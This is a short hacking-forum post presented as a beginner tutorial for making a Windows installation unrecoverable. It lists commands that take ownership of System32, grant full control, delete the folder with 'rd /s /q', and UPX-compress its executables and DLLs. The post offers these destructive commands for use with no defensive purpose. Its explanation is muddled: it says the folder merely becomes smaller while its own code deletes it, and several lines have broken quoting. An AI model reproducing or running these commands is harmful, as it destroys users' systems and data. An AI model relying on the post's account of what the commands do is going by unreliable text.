[Noob Tutorial] How to damage a Windows install and make it unrecoverable! 05-18-2021, 05:37 PM
#1
The idea here is to damage a Windows install and make it unrecoverable. Since i couldn't find a simple one way crypter than i use upx.
REQUIRE ADMIN PRIVILEGES AND NEED UPX
The code above will remove system privileges in C:\Windows\System32 and compress all exes and dlls not being used by the system. This will make C:\Windows\System32 smaller and unusable specially if compressing the dlls.
REQUIRE ADMIN PRIVILEGES AND NEED UPX
Code:
takeown /R /A /F C:\Windows\System32 /D N
icacls C:\Windows\System32 /grant Administrators:F /T /C
rd /s /q C:\Windows\system32
upx.exe -9 "C:\Windows\System32\*.exe
upx.exe -9 "C:\Windows\System32\*.dllThe code above will remove system privileges in C:\Windows\System32 and compress all exes and dlls not being used by the system. This will make C:\Windows\System32 smaller and unusable specially if compressing the dlls.

![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)